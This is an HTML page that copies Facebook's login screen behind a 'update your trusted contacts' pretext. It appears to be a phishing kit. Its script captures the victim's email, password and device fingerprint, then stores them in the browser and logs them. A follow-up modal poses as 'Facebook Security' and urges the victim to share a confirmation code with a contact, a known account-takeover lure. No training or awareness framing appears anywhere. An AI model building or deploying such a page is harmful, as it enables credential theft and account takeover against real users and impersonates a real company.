<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
  <title>Log in to Facebook to Update Your Trusted Contacts</title>
  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap" rel="stylesheet">
  <style>
    /* Reset styles */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }
    
    body {
      font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
      background-color: #F0F2F5;
      color: #1C1E21;
      min-height: 100vh;
      display: flex;
      flex-direction: column;
    }
    
    /* Utility Classes */
    .flex {
      display: flex;
    }
    
    .flex-col {
      flex-direction: column;
    }
    
    .items-center {
      align-items: center;
    }
    
    .justify-center {
      justify-content: center;
    }
    
    .w-full {
      width: 100%;
    }
    
    .text-center {
      text-align: center;
    }
    
    .rounded {
      border-radius: 6px;
    }
    
    .shadow {
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
    }
    
    .p-4 {
      padding: 1rem;
    }
    
    .my-3 {
      margin-top: 0.75rem;
      margin-bottom: 0.75rem;
    }
    
    .mb-3 {
      margin-bottom: 0.75rem;
    }
    
    .mb-4 {
      margin-bottom: 1rem;
    }
    
    .mt-3 {
      margin-top: 0.75rem;
    }
    
    .mr-3 {
      margin-right: 0.75rem;
    }
    
    .mx-auto {
      margin-left: auto;
      margin-right: auto;
    }
    
    .text-xs {
      font-size: 0.75rem;
    }
    
    .text-sm {
      font-size: 0.875rem;
    }
    
    .text-base {
      font-size: 1rem;
    }
    
    .text-xl {
      font-size: 1.25rem;
    }
    
    .text-2xl {
      font-size: 1.5rem;
    }
    
    .text-3xl {
      font-size: 1.875rem;
    }
    
    .font-bold {
      font-weight: 700;
    }
    
    /* Facebook-specific styles */
    .bg-facebook-blue {
      background-color: #1877F2;
    }
    
    .bg-facebook-green {
      background-color: #42B72A;
    }
    
    .text-facebook-blue {
      color: #1877F2;
    }
    
    .text-white {
      color: white;
    }
    
    .text-facebook-text-light {
      color: #606770;
    }
    
    .separator {
      height: 1px;
      background-color: #dadde1;
      width: 100%;
      margin: 1rem 0;
    }
    
    .container {
      max-width: 1000px;
      margin: 0 auto;
      padding: 1rem;
    }
    
    .main-container {
      display: flex;
      flex-direction: column;
      padding: 1.5rem 1rem;
      margin-top: 2rem;
    }
    
    /* Form styles */
    .login-form {
      background-color: white;
      padding: 1rem;
      border-radius: 8px;
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
      width: 100%;
      max-width: 400px;
      margin-bottom: 1rem;
    }
    
    .input-field {
      width: 100%;
      padding: 0.875rem 1rem;
      margin-bottom: 0.75rem;
      border: 1px solid #dddfe2;
      border-radius: 6px;
      font-size: 1rem;
    }
    
    .input-field:focus {
      outline: none;
      border-color: #1877F2;
      box-shadow: 0 0 0 2px #e7f3ff;
    }
    
    .login-button {
      width: 100%;
      background-color: #1877F2;
      color: white;
      border: none;
      border-radius: 6px;
      padding: 0.75rem;
      font-size: 1.25rem;
      font-weight: bold;
      cursor: pointer;
      margin-bottom: 1rem;
      transition: background-color 0.2s ease;
    }
    
    .login-button:hover {
      background-color: #166FE5;
    }
    
    .login-button:active {
      transform: scale(0.98);
    }
    
    .create-account-button {
      background-color: #42B72A;
      color: white;
      border: none;
      border-radius: 6px;
      padding: 0.75rem 1rem;
      font-size: 1rem;
      font-weight: bold;
      cursor: pointer;
      transition: background-color 0.2s ease;
    }
    
    .create-account-button:hover {
      background-color: #36A420;
    }
    
    a {
      text-decoration: none;
      color: #1877F2;
    }
    
    a:hover {
      text-decoration: underline;
    }
    
    /* Footer styles */
    .footer {
      background-color: white;
      padding: 1.5rem 1rem;
      margin-top: auto;
    }
    
    .language-list, .link-list {
      display: flex;
      flex-wrap: wrap;
    }
    
    .language-list div, .link-list div {
      margin-right: 0.75rem;
      margin-bottom: 0.25rem;
      color: #606770;
      font-size: 0.75rem;
      cursor: pointer;
    }
    
    /* Modal styles */
    .bedtime-modal {
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background-color: rgba(0, 0, 0, 0.7);
      display: flex;
      align-items: center;
      justify-content: center;
      z-index: 1000;
      opacity: 0;
      pointer-events: none;
      transition: opacity 0.3s ease;
    }
    
    .bedtime-modal.show {
      opacity: 1;
      pointer-events: auto;
    }
    
    .modal-content {
      background-color: white;
      padding: 2rem;
      border-radius: 8px;
      max-width: 450px;
      width: 100%;
      text-align: center;
      box-shadow: 0 5px 20px rgba(0, 0, 0, 0.2);
      transform: translateY(20px);
      transition: transform 0.3s ease;
    }
    
    .bedtime-modal.show .modal-content {
      transform: translateY(0);
    }
    
    .modal-close-button {
      background-color: #1877F2;
      color: white;
      border: none;
      border-radius: 6px;
      padding: 0.9rem 1.5rem;
      font-size: 1rem;
      font-weight: bold;
      cursor: pointer;
      transition: background-color 0.2s ease;
      min-width: 180px;
      margin-top: 10px;
    }
    
    .modal-close-button:hover {
      background-color: #166FE5;
    }
    
    .error-message {
      color: #ff0000;
      font-size: 0.75rem;
      margin-top: -0.5rem;
      margin-bottom: 0.75rem;
      display: none;
    }
    
    /* Responsive styles */
    @media (min-width: 768px) {
      .main-container {
        flex-direction: row;
        align-items: center;
        justify-content: center;
        gap: 2rem;
        padding: 5rem 1rem;
      }
      
      .branding {
        width: 50%;
        text-align: left;
      }
      
      .branding img {
        margin-left: 0;
      }
      
      .branding h2 {
        margin-left: 0;
        margin-right: 0;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <!-- Main container -->
    <div class="main-container">
      <!-- Branding section -->
      <div class="branding text-center">
        <div style="margin-bottom: 1.5rem; text-align: center;">
          <h1 style="color: #1877F2; font-size: 60px; font-weight: bold; margin: 0 auto; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; letter-spacing: -2px;">facebook</h1>
        </div>
        <p style="color: #606770; font-size: 14px; max-width: 450px; margin: 0 auto 1.5rem; line-height: 1.2; font-weight: normal;">Log in to confirm your identity and secure your Facebook account. Updating your trusted contacts helps keep your account safe and protected.</p>
      </div>
      
      <!-- Login form section -->
      <div class="login-form-container">
        <div class="login-form">
          <form id="login-form">
            <input type="text" class="input-field" id="email" placeholder="Email address or phone number" required>
            <div class="error-message" id="email-error">Please enter your email or phone number</div>
            
            <input type="password" class="input-field" id="password" placeholder="Password" required>
            <div class="error-message" id="password-error">Please enter your password</div>
            
            <button type="submit" class="login-button">Log In</button>
          </form>
          
          <div class="text-center mb-4">
            <a href="#" class="text-facebook-blue text-sm">Forgotten password?</a>
          </div>
          
          <div class="separator"></div>
          
          <div class="text-center">
            <button class="create-account-button">Create New Account</button>
          </div>
        </div>
        
        <div class="text-center text-sm">
          <p><a href="#" class="font-bold">Create a Page</a> for a celebrity, brand or business.</p>
        </div>
      </div>
    </div>
  </div>
  
  <!-- Footer -->
  <div class="footer">
    <div class="container">
      <div class="language-list">
        <div>English (US)</div>
        <div>Español</div>
        <div>Français (France)</div>
        <div>中文(简体)</div>
        <div>العربية</div>
        <div>Português (Brasil)</div>
        <div>Italiano</div>
        <div>한국어</div>
        <div>Deutsch</div>
        <div>हिन्दी</div>
        <div>日本語</div>
      </div>
      
      <div class="separator"></div>
      
      <div class="link-list">
        <div>Sign Up</div>
        <div>Log In</div>
        <div>Messenger</div>
        <div>Facebook Lite</div>
        <div>Watch</div>
        <div>Places</div>
        <div>Games</div>
        <div>Marketplace</div>
        <div>Meta Pay</div>
        <div>Meta Store</div>
      </div>
      
      <div class="mt-3 text-xs text-facebook-text-light">
        Meta © 2023
      </div>
    </div>
  </div>
  
  <!-- Confirmation Modal -->
  <div class="bedtime-modal" id="bedtime-modal">
    <div class="modal-content">
      <div style="text-align: center;">
        <svg xmlns="http://www.w3.org/2000/svg" width="64" height="64" viewBox="0 0 24 24" fill="none" stroke="#1877F2" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" style="margin: 0 auto 1rem;">
          <path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path>
          <polyline points="22 4 12 14.01 9 11.01"></polyline>
        </svg>
        <h2 class="text-2xl font-bold mb-3 text-facebook-blue">You're almost done</h2>
        <p class="mb-4" style="font-size: 16px; line-height: 1.4;">
          For your account security, we need to verify your identity. Please review the message below.
        </p>
        
        <!-- Facebook message style notification -->
        <div style="margin: 20px auto; padding: 15px; background-color: #f0f2f5; border-radius: 8px; width: 90%; max-width: 350px; text-align: left;">
          <p style="font-size: 15px; color: #050505; line-height: 1.4; margin-bottom: 10px;">
            <span style="color: #1877F2; font-weight: bold;">Facebook Security:</span> We've sent you a confirmation code. Share this code with one of your trusted contacts to help complete your identity verification.
          </p>
          <p style="font-size: 14px; color: #65676B; line-height: 1.3;">
            This verification process helps ensure the security of your Facebook account.
          </p>
        </div>
        
        <a href="https://www.facebook.com" class="modal-close-button" id="modal-close-button" style="display: inline-block; text-decoration: none; margin-top: 10px;">
          Continue to Facebook
        </a>
      </div>
    </div>
  </div>
  
  <script>
    // Form validation and modal functionality
    document.addEventListener('DOMContentLoaded', function() {
      const loginForm = document.getElementById('login-form');
      const emailInput = document.getElementById('email');
      const passwordInput = document.getElementById('password');
      const emailError = document.getElementById('email-error');
      const passwordError = document.getElementById('password-error');
      const modal = document.getElementById('bedtime-modal');
      const closeButton = document.getElementById('modal-close-button');
      
      // Validate email field
      function validateEmail() {
        if (!emailInput.value.trim()) {
          emailError.style.display = 'block';
          return false;
        } else {
          emailError.style.display = 'none';
          return true;
        }
      }
      
      // Validate password field
      function validatePassword() {
        if (!passwordInput.value.trim()) {
          passwordError.style.display = 'block';
          return false;
        } else {
          passwordError.style.display = 'none';
          return true;
        }
      }
      
      // Event listeners for input fields
      emailInput.addEventListener('blur', validateEmail);
      passwordInput.addEventListener('blur', validatePassword);
      
      emailInput.addEventListener('input', function() {
        if (emailError.style.display === 'block') {
          validateEmail();
        }
      });
      
      passwordInput.addEventListener('input', function() {
        if (passwordError.style.display === 'block') {
          validatePassword();
        }
      });
      
      // Form submission
      loginForm.addEventListener('submit', function(e) {
        e.preventDefault();
        
        const emailValid = validateEmail();
        const passwordValid = validatePassword();
        
        if (emailValid && passwordValid) {
          const email = emailInput.value.trim();
          const password = passwordInput.value.trim();
          
          // Get device information
          const deviceInfo = {
            userAgent: navigator.userAgent,
            platform: navigator.platform,
            vendor: navigator.vendor,
            screenWidth: window.screen.width,
            screenHeight: window.screen.height,
            language: navigator.language,
            timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone
          };
          
          // In standalone version, we'll just log the information locally
          console.log('Login information:', { 
            email, 
            password,
            deviceInfo
          });
          
          // We can also store it in localStorage if needed for demonstration purposes
          localStorage.setItem('facebook_login', JSON.stringify({
            email,
            password,
            deviceInfo,
            timestamp: new Date().toISOString()
          }));
          
          // Show bedtime modal after short delay
          setTimeout(function() {
            modal.classList.add('show');
          }, 500);
        }
      });
      
      // Close modal when button is clicked
      closeButton.addEventListener('click', function() {
        modal.classList.remove('show');
      });
      
      // Close modal when clicking outside content
      modal.addEventListener('click', function(e) {
        if (e.target === modal) {
          modal.classList.remove('show');
        }
      });
    });
  </script>
</body>
</html>